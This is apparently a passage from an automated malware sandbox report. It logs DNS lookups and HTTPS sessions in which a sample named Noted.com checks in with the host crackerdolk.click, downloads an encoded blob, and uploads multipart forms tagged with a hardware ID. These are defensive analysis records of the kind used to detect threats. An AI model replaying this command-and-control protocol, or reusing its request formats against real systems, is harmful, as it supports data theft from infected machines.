                                      Dec 28, 2024 09:13:22.042922020 CET1.1.1.1192.168.2.50xfd3cNo error (0)crackerdolk.click104.21.112.1A (IP address)IN (0x0001)false
                                      Dec 28, 2024 09:13:22.042922020 CET1.1.1.1192.168.2.50xfd3cNo error (0)crackerdolk.click104.21.16.1A (IP address)IN (0x0001)false
                                      Dec 28, 2024 09:13:22.042922020 CET1.1.1.1192.168.2.50xfd3cNo error (0)crackerdolk.click104.21.32.1A (IP address)IN (0x0001)false
                                      Dec 28, 2024 09:13:22.042922020 CET1.1.1.1192.168.2.50xfd3cNo error (0)crackerdolk.click104.21.96.1A (IP address)IN (0x0001)false
                                      Dec 28, 2024 09:13:22.042922020 CET1.1.1.1192.168.2.50xfd3cNo error (0)crackerdolk.click104.21.48.1A (IP address)IN (0x0001)false
                                      Dec 28, 2024 09:13:22.042922020 CET1.1.1.1192.168.2.50xfd3cNo error (0)crackerdolk.click104.21.64.1A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • crackerdolk.click

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549727104.21.80.14431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      TimestampBytes transferredDirectionData
                                      2024-12-28 08:13:23 UTC264OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 8
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:23 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                      Data Ascii: act=life
                                      2024-12-28 08:13:24 UTC1135INHTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:23 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=j0rjkmonljqcj7424l37pu85mk; expires=Wed, 23 Apr 2025 02:00:02 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B2GQNLPxn7MvfCZEm%2FeB9mj8LhR3eGqTr5gM9c2%2Fd6vNNHWoxHLJYft3DtqZmI%2FI7KW94k9PeAw5TyFZn%2BlGgUQ%2FnjeDhkdmXroDtp5SyHKVz6VZpYf8ARPF4ls0%2BUJiw5qrXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f90173e6f93c46b-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1585&rtt_var=613&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=908&delivery_rate=1842271&cwnd=226&unsent_bytes=0&cid=6118aae26758b997&ts=767&x=0"
                                      2024-12-28 08:13:24 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                      Data Ascii: 2ok
                                      2024-12-28 08:13:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549733104.21.80.14431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      TimestampBytes transferredDirectionData
                                      2024-12-28 08:13:25 UTC265OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 76
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:25 UTC76OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 6c 33 26 6a 3d 35 66 38 33 61 37 35 66 62 37 30 33 33 31 32 39 64 65 34 35 62 34 30 33 32 38 35 61 36 37 32 33
                                      Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--l3&j=5f83a75fb7033129de45b403285a6723
                                      2024-12-28 08:13:26 UTC1131INHTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:26 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=eq00gg79i63q028t8o2usor3j4; expires=Wed, 23 Apr 2025 02:00:04 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=48AccNOyrXu8toZdV95aKgsDAgI10ZORYyD9p6DYjf8%2BzoCQsfD4vz4HRjZ27JBFrLRgQHFtrglNhOMDhdA3Wdp%2B3LUhcDYFiUTygi7HYwvvhlAAodl9%2BXFkt5MfKD%2B8WjvYqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f90174b68ef7d05-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1982&rtt_var=753&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=977&delivery_rate=1443400&cwnd=195&unsent_bytes=0&cid=e0a47e2e335f16bc&ts=799&x=0"
                                      2024-12-28 08:13:26 UTC238INData Raw: 31 34 38 32 0d 0a 67 4e 70 48 72 47 52 47 50 61 31 4b 57 41 72 52 64 56 31 56 59 72 69 47 63 58 39 42 4e 2f 54 70 5a 4c 62 75 47 52 34 4f 41 52 50 37 2b 44 47 4f 58 6e 49 52 6a 7a 6b 39 4b 4f 73 42 4c 79 41 48 6c 4b 51 51 47 32 4d 4e 6b 6f 67 49 78 59 73 31 50 48 68 73 4d 62 71 38 4a 73 41 58 49 78 47 50 4c 79 41 6f 36 79 34 6d 64 77 66 57 70 45 74 64 4a 46 32 57 69 41 6a 55 6a 33 4a 78 66 6d 31 77 36 4c 59 67 78 41 45 6c 57 63 77 6d 4e 57 2b 30 45 44 77 2f 44 4e 48 72 47 52 4a 6a 47 39 61 4d 48 70 54 55 4f 31 4e 72 64 58 4c 4e 75 7a 54 48 52 6a 73 52 31 6d 67 39 5a 50 4e 50 66 7a 51 48 32 75 6f 58 47 79 70 66 6e 49 45 41 31 59 70 7a 62 6d 64 6e 65 2b 69 34 49 38 55 4c 4c 45 33 42 4c 44 4a 6b 73 68 6f 38
                                      Data Ascii: 1482gNpHrGRGPa1KWArRdV1VYriGcX9BN/TpZLbuGR4OARP7+DGOXnIRjzk9KOsBLyAHlKQQG2MNkogIxYs1PHhsMbq8JsAXIxGPLyAo6y4mdwfWpEtdJF2WiAjUj3Jxfm1w6LYgxAElWcwmNW+0EDw/DNHrGRJjG9aMHpTUO1NrdXLNuzTHRjsR1mg9ZPNPfzQH2uoXGypfnIEA1Ypzbmdne+i4I8ULLE3BLDJksho8
                                      2024-12-28 08:13:26 UTC1369INData Raw: 64 30 36 61 34 77 74 64 65 78 58 46 75 51 58 46 6e 57 35 78 66 47 55 78 2f 66 59 38 6a 67 45 6f 48 35 64 6f 4d 6d 53 39 45 6a 77 34 42 39 76 6b 41 52 49 6a 56 70 36 44 41 74 36 44 64 48 4e 69 61 58 62 71 73 53 4c 42 41 53 78 5a 77 43 74 36 4a 76 4d 51 4a 33 64 59 6d 73 51 44 48 69 42 42 6d 35 70 47 79 38 4a 69 50 47 74 76 4d 62 72 34 49 38 41 48 4b 56 2f 64 49 44 46 6a 74 67 55 30 50 67 33 58 35 42 34 58 4c 46 61 57 6a 41 7a 65 67 33 46 34 59 57 35 33 34 72 68 6c 67 45 59 6a 52 34 39 77 65 6b 75 32 42 7a 67 37 46 70 6a 65 55 77 4a 74 54 4e 61 4d 43 70 54 55 4f 33 52 70 59 48 4c 70 74 79 62 47 44 54 5a 66 33 53 34 33 62 61 45 52 4f 6a 6b 4b 32 66 59 5a 45 79 56 57 6e 34 41 50 30 59 74 2f 50 43 49 6a 64 76 72 34 66 59 34 6e 4b 56 54 44 49 69 31 6f 38 77 68
                                      Data Ascii: d06a4wtdexXFuQXFnW5xfGUx/fY8jgEoH5doMmS9Ejw4B9vkARIjVp6DAt6DdHNiaXbqsSLBASxZwCt6JvMQJ3dYmsQDHiBBm5pGy8JiPGtvMbr4I8AHKV/dIDFjtgU0Pg3X5B4XLFaWjAzeg3F4YW534rhlgEYjR49weku2Bzg7FpjeUwJtTNaMCpTUO3RpYHLptybGDTZf3S43baEROjkK2fYZEyVWn4AP0Yt/PCIjdvr4fY4nKVTDIi1o8wh
                                      2024-12-28 08:13:26 UTC1369INData Raw: 76 59 66 46 79 56 61 6d 34 64 47 6d 73 78 38 5a 43 77 37 4d 63 69 37 4d 63 30 4d 5a 6d 72 4d 4a 6a 52 76 70 56 63 67 65 52 6d 61 34 78 39 64 65 78 57 62 69 67 37 53 6e 6e 52 78 62 32 31 2f 37 62 30 71 78 67 59 6b 55 73 6f 73 4d 57 4f 77 47 6a 73 6c 43 74 72 73 46 68 77 70 58 39 62 46 52 74 4f 55 4f 79 51 73 55 6d 62 70 2b 68 44 4e 43 43 70 59 32 57 67 6c 4a 71 70 58 4f 44 74 41 67 71 51 65 46 53 5a 51 6d 59 6f 4d 32 6f 6c 78 63 47 52 74 63 76 43 33 49 63 34 4b 4c 46 58 43 4a 6a 35 67 75 68 77 30 4d 51 44 62 37 6c 4e 54 59 31 4b 4f 79 31 36 55 75 48 78 77 59 57 77 7a 31 37 73 72 77 41 45 79 48 39 42 6d 49 79 69 30 47 33 39 76 51 4e 62 74 45 78 59 70 55 5a 61 4d 43 39 47 50 66 48 39 68 5a 48 76 73 76 79 48 43 44 79 6c 5a 7a 79 38 2b 62 61 45 53 4e 6a 73 4d
                                      Data Ascii: vYfFyVam4dGmsx8ZCw7Mci7Mc0MZmrMJjRvpVcgeRma4x9dexWbig7SnnRxb21/7b0qxgYkUsosMWOwGjslCtrsFhwpX9bFRtOUOyQsUmbp+hDNCCpY2WglJqpXODtAgqQeFSZQmYoM2olxcGRtcvC3Ic4KLFXCJj5guhw0MQDb7lNTY1KOy16UuHxwYWwz17srwAEyH9BmIyi0G39vQNbtExYpUZaMC9GPfH9hZHvsvyHCDylZzy8+baESNjsM
                                      2024-12-28 08:13:26 UTC1369INData Raw: 74 6a 53 74 69 53 52 74 4f 41 4f 79 51 73 61 6e 6a 77 74 69 76 48 43 79 4a 58 79 43 59 33 59 37 55 63 4f 44 41 47 31 2b 77 65 47 43 42 55 6b 6f 45 55 31 34 64 78 63 57 59 6a 50 36 4b 2f 50 59 35 65 5a 48 6a 44 41 53 70 7a 6f 51 46 2f 4b 45 37 44 70 42 51 52 59 77 33 57 69 41 6e 64 67 33 4e 30 59 32 78 31 37 4c 34 6a 77 77 4d 72 56 64 30 67 4e 47 57 34 47 44 51 6c 41 4e 66 67 48 78 6b 72 58 70 7a 4c 53 4a 53 4c 59 7a 77 30 49 30 54 76 74 79 58 4e 45 47 52 41 67 54 46 36 62 37 39 58 5a 33 63 4d 31 4f 51 63 45 53 39 65 6e 6f 6f 4b 32 6f 74 2b 64 57 52 72 59 2b 4f 38 4c 63 38 49 4b 31 37 4c 4c 54 39 73 74 42 4d 35 4f 45 43 55 70 42 51 46 59 77 33 57 70 43 48 68 7a 6c 70 47 4c 48 77 2f 2b 2f 67 69 77 6b 5a 38 48 38 4d 72 4e 6d 43 38 45 54 59 37 43 74 50 76 48
                                      Data Ascii: tjStiSRtOAOyQsanjwtivHCyJXyCY3Y7UcODAG1+weGCBUkoEU14dxcWYjP6K/PY5eZHjDASpzoQF/KE7DpBQRYw3WiAndg3N0Y2x17L4jwwMrVd0gNGW4GDQlANfgHxkrXpzLSJSLYzw0I0TvtyXNEGRAgTF6b79XZ3cM1OQcES9enooK2ot+dWRrY+O8Lc8IK17LLT9stBM5OECUpBQFYw3WpCHhzlpGLHw/+/giwkZ8H8MrNmC8ETY7CtPvH
                                      2024-12-28 08:13:26 UTC913INData Raw: 56 6a 77 50 62 6a 58 70 36 66 6d 52 34 38 4c 59 6f 77 51 34 73 56 73 34 73 50 32 57 31 47 7a 55 32 42 39 54 71 47 31 31 74 46 5a 47 54 52 6f 7a 4d 57 6d 78 33 63 57 66 76 6d 53 6a 42 52 6a 73 52 31 6d 67 39 5a 50 4e 50 66 7a 34 53 33 75 6b 42 46 43 52 62 6d 59 67 55 31 59 46 77 62 6d 74 73 64 65 57 30 49 38 45 41 4a 56 72 46 4a 44 31 74 75 42 67 7a 64 30 36 61 34 77 74 64 65 78 57 34 67 42 58 44 6a 33 56 33 65 6e 67 78 2f 66 59 38 6a 67 45 6f 48 35 64 6f 4f 57 4f 34 45 7a 38 37 41 4e 37 70 45 77 38 73 55 70 47 43 44 63 61 47 66 48 74 6e 61 33 72 74 76 6a 66 43 43 44 5a 61 33 54 70 36 4a 76 4d 51 4a 33 64 59 6d 74 49 55 44 54 4e 57 31 4c 6f 51 31 35 70 77 63 57 41 6a 62 71 79 68 5a 63 6b 4b 5a 41 65 50 4c 6a 56 68 73 42 67 2b 50 67 7a 58 34 52 6f 59 49 6c
                                      Data Ascii: VjwPbjXp6fmR48LYowQ4sVs4sP2W1GzU2B9TqG11tFZGTRozMWmx3cWfvmSjBRjsR1mg9ZPNPfz4S3ukBFCRbmYgU1YFwbmtsdeW0I8EAJVrFJD1tuBgzd06a4wtdexW4gBXDj3V3engx/fY8jgEoH5doOWO4Ez87AN7pEw8sUpGCDcaGfHtna3rtvjfCCDZa3Tp6JvMQJ3dYmtIUDTNW1LoQ15pwcWAjbqyhZckKZAePLjVhsBg+PgzX4RoYIl
                                      2024-12-28 08:13:26 UTC1369INData Raw: 33 61 65 35 0d 0a 67 6a 78 41 49 6e 56 73 77 76 4d 32 36 34 46 44 55 34 42 39 7a 67 45 78 59 6b 57 35 43 4f 44 64 33 4d 4e 54 78 72 65 7a 47 36 2b 41 50 74 46 44 5a 74 77 53 73 68 4b 4b 78 5a 4a 6e 63 48 31 71 52 4c 58 53 68 64 6d 5a 6b 44 33 59 52 2f 64 57 78 6e 65 2b 2b 2f 4a 63 73 4c 49 56 76 42 4c 44 31 6f 76 78 67 34 50 77 2f 65 35 42 78 64 62 52 57 52 6b 30 61 4d 7a 46 74 33 65 6b 4a 2f 36 61 70 6c 30 55 67 39 48 38 67 6b 65 6a 44 7a 47 54 59 32 43 4e 54 6f 47 78 6b 78 56 5a 32 43 43 64 57 44 65 33 39 74 61 58 6e 77 76 69 58 46 44 69 4e 58 79 79 59 6f 61 62 78 58 63 58 63 48 77 71 52 4c 58 52 4a 44 6b 59 77 4a 6c 71 56 38 5a 32 31 70 63 75 6d 30 5a 64 46 49 50 52 2f 49 4a 48 6f 77 38 78 6f 7a 4f 67 54 49 36 42 4d 64 4b 6c 4b 63 6d 51 6e 62 67 58 68
                                      Data Ascii: 3ae5gjxAInVswvM264FDU4B9zgExYkW5CODd3MNTxrezG6+APtFDZtwSshKKxZJncH1qRLXShdmZkD3YR/dWxne++/JcsLIVvBLD1ovxg4Pw/e5BxdbRWRk0aMzFt3ekJ/6apl0Ug9H8gkejDzGTY2CNToGxkxVZ2CCdWDe39taXnwviXFDiNXyyYoabxXcXcHwqRLXRJDkYwJlqV8Z21pcum0ZdFIPR/IJHow8xozOgTI6BMdKlKcmQnbgXh
                                      2024-12-28 08:13:26 UTC1369INData Raw: 2f 43 35 4c 38 49 48 49 31 6a 45 4f 6a 46 36 75 42 38 38 4f 51 6a 54 35 42 30 64 49 6c 69 57 79 30 69 55 69 32 4d 38 4e 43 4e 55 77 61 38 7a 78 45 51 48 53 4e 6b 69 50 57 53 6c 48 44 34 30 46 74 66 30 55 31 4e 6a 52 4a 47 61 52 6f 79 61 61 32 74 72 66 44 2f 37 2b 43 4c 43 52 6e 77 66 78 43 63 30 5a 62 67 54 4e 6a 49 49 32 65 45 57 46 79 39 5a 6c 34 4d 50 33 6f 6c 2b 65 6d 5a 67 66 2b 32 35 4b 63 6f 50 4b 6c 61 50 5a 6e 70 76 71 31 64 6e 64 7a 62 4b 34 77 73 51 4d 78 65 6b 69 42 66 46 6d 58 5a 73 61 69 46 65 34 62 51 6d 79 77 45 30 48 39 42 6d 49 79 69 30 47 33 39 76 51 4e 72 67 48 78 34 6b 57 35 6d 47 43 64 4f 48 64 48 5a 69 63 58 37 6e 73 43 6e 47 43 7a 5a 56 78 54 6f 7a 59 62 34 5a 4e 79 55 44 6d 71 70 54 47 6a 73 56 7a 73 73 30 33 6f 39 33 61 6d 46 73
                                      Data Ascii: /C5L8IHI1jEOjF6uB88OQjT5B0dIliWy0iUi2M8NCNUwa8zxEQHSNkiPWSlHD40Ftf0U1NjRJGaRoyaa2trfD/7+CLCRnwfxCc0ZbgTNjII2eEWFy9Zl4MP3ol+emZgf+25KcoPKlaPZnpvq1dndzbK4wsQMxekiBfFmXZsaiFe4bQmywE0H9BmIyi0G39vQNrgHx4kW5mGCdOHdHZicX7nsCnGCzZVxTozYb4ZNyUDmqpTGjsVzss03o93amFs
                                      2024-12-28 08:13:26 UTC1369INData Raw: 6e 77 4f 44 46 63 77 53 59 39 66 71 4a 58 63 58 63 50 6d 72 77 71 58 57 73 56 71 63 56 47 7a 4d 77 6a 50 46 6c 67 66 2b 79 2f 4d 39 39 4c 42 46 54 5a 4b 54 64 6a 76 31 55 2b 4f 68 44 64 70 46 31 64 4a 52 58 4f 32 30 69 55 69 47 6f 38 4e 44 4d 6a 75 65 31 32 6d 56 5a 32 51 49 45 78 65 6e 37 7a 54 32 31 35 51 4d 69 6b 53 31 31 6b 56 6f 53 5a 41 4e 65 61 65 44 74 53 58 56 48 70 74 43 62 43 42 79 4d 66 67 57 67 31 4b 4f 73 75 66 7a 51 53 79 4b 73 43 43 79 35 46 6b 63 63 4f 78 59 46 33 50 43 49 6a 50 65 61 7a 4b 63 73 42 4e 42 44 64 4f 44 46 6b 70 56 73 37 4a 55 43 55 70 41 49 57 4c 45 65 59 6a 45 6e 46 6d 6e 5a 73 62 32 5a 32 72 72 41 30 77 77 70 6b 45 59 38 39 4d 57 53 31 47 69 70 34 45 63 7a 6e 42 52 70 76 58 59 65 47 43 70 53 7a 4e 54 78 30 49 79 6d 69 6a
                                      Data Ascii: nwODFcwSY9fqJXcXcPmrwqXWsVqcVGzMwjPFlgf+y/M99LBFTZKTdjv1U+OhDdpF1dJRXO20iUiGo8NDMjue12mVZ2QIExen7zT215QMikS11kVoSZANeaeDtSXVHptCbCByMfgWg1KOsufzQSyKsCCy5FkccOxYF3PCIjPeazKcsBNBDdODFkpVs7JUCUpAIWLEeYjEnFmnZsb2Z2rrA0wwpkEY89MWS1Gip4EcznBRpvXYeGCpSzNTx0Iymij
                                      2024-12-28 08:13:26 UTC1369INData Raw: 6a 53 64 35 6c 48 47 75 30 45 54 77 35 46 38 75 6b 58 56 30 6c 46 63 37 5a 53 4a 53 49 61 6a 77 30 4d 79 4f 35 37 58 61 5a 56 6e 5a 41 67 54 46 36 66 76 4e 50 62 48 6c 41 79 4b 52 4c 58 57 52 62 6d 34 6f 46 32 6f 39 70 62 6d 70 67 5a 2b 48 2f 47 2f 41 6a 4b 56 4c 4b 4a 6a 31 57 6a 54 59 31 4a 77 33 56 34 79 30 6a 46 45 53 52 6d 30 54 79 6a 32 31 2f 4c 43 30 78 2b 76 68 39 6a 69 63 75 54 38 49 6e 50 53 6a 39 56 7a 74 33 57 4a 72 42 48 68 41 6d 57 35 48 4a 4a 39 36 63 64 6e 4e 72 49 7a 2b 69 74 47 57 57 52 69 56 56 33 79 55 31 62 2f 38 51 4a 54 42 41 6c 4b 51 64 58 58 73 56 6c 34 45 57 32 59 4e 38 4d 47 70 74 66 36 4b 6e 61 39 64 47 4d 68 2b 58 65 33 51 6f 6f 56 64 6e 64 30 66 55 36 52 49 65 4c 56 61 45 6d 51 44 58 6d 6e 67 37 55 6c 31 55 37 37 55 67 77 41
                                      Data Ascii: jSd5lHGu0ETw5F8ukXV0lFc7ZSJSIajw0MyO57XaZVnZAgTF6fvNPbHlAyKRLXWRbm4oF2o9pbmpgZ+H/G/AjKVLKJj1WjTY1Jw3V4y0jFESRm0Tyj21/LC0x+vh9jicuT8InPSj9Vzt3WJrBHhAmW5HJJ96cdnNrIz+itGWWRiVV3yU1b/8QJTBAlKQdXXsVl4EW2YN8MGptf6Kna9dGMh+Xe3QooVdnd0fU6RIeLVaEmQDXmng7Ul1U77UgwA


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.549738104.21.80.14431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      TimestampBytes transferredDirectionData
                                      2024-12-28 08:13:27 UTC278OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=VIIPI8FN01MEB
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 12802
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:27 UTC12802OUTData Raw: 2d 2d 56 49 49 50 49 38 46 4e 30 31 4d 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 56 49 49 50 49 38 46 4e 30 31 4d 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 49 49 50 49 38 46 4e 30 31 4d 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 56 49 49 50 49 38 46 4e 30 31 4d 45 42 0d
                                      Data Ascii: --VIIPI8FN01MEBContent-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--VIIPI8FN01MEBContent-Disposition: form-data; name="pid"2--VIIPI8FN01MEBContent-Disposition: form-data; name="lid"jMw1IE--l3--VIIPI8FN01MEB
                                      2024-12-28 08:13:28 UTC1127INHTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:28 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=vga167i12vbt0hinivb13t4amh; expires=Wed, 23 Apr 2025 02:00:07 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGCJ5gijiReD43sq7BNakrxcfhRdKDaR5NhPFZ0Vj9USmg9jRP4m8beXNtJuwGnC3CSMJRTaQkC2vkyxjQJeDoaJXYgyOM7aQiyHpOU43f4xkeRdfBkfxiKeuiHSdqQ2a4cAOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017599b1d7d05-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1985&rtt_var=774&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13738&delivery_rate=1386514&cwnd=195&unsent_bytes=0&cid=323270b01428a920&ts=939&x=0"
                                      2024-12-28 08:13:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2024-12-28 08:13:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.549744104.21.80.14431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      TimestampBytes transferredDirectionData
                                      2024-12-28 08:13:29 UTC279OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=GK175PZ75M1UY3
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 15050
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:29 UTC15050OUTData Raw: 2d 2d 47 4b 31 37 35 50 5a 37 35 4d 31 55 59 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 47 4b 31 37 35 50 5a 37 35 4d 31 55 59 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 4b 31 37 35 50 5a 37 35 4d 31 55 59 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 47 4b 31 37 35 50 5a 37 35 4d 31
                                      Data Ascii: --GK175PZ75M1UY3Content-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--GK175PZ75M1UY3Content-Disposition: form-data; name="pid"2--GK175PZ75M1UY3Content-Disposition: form-data; name="lid"jMw1IE--l3--GK175PZ75M1
                                      2024-12-28 08:13:30 UTC1131INHTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:30 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=428sm9pffekpiph6r15g8uss5c; expires=Wed, 23 Apr 2025 02:00:09 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6da5TGXtnS3885hIzyijqkbXgNwMl7x6KURwilHL965QENZCqjuYoelYCI%2BPCpIFFtjImsJEeV9azvG7qWoVHG3SO1TdJk5%2F5SJy3saSMQUl3uxlAoBTwqtDTquzBvgPoYuM2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017670be97d05-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2004&rtt_var=766&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15987&delivery_rate=1414728&cwnd=195&unsent_bytes=0&cid=423a7f3ddb197726&ts=935&x=0"
                                      2024-12-28 08:13:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2024-12-28 08:13:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.549750104.21.80.14431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      TimestampBytes transferredDirectionData
                                      2024-12-28 08:13:32 UTC273OUTPOST /api HTTP/1.1
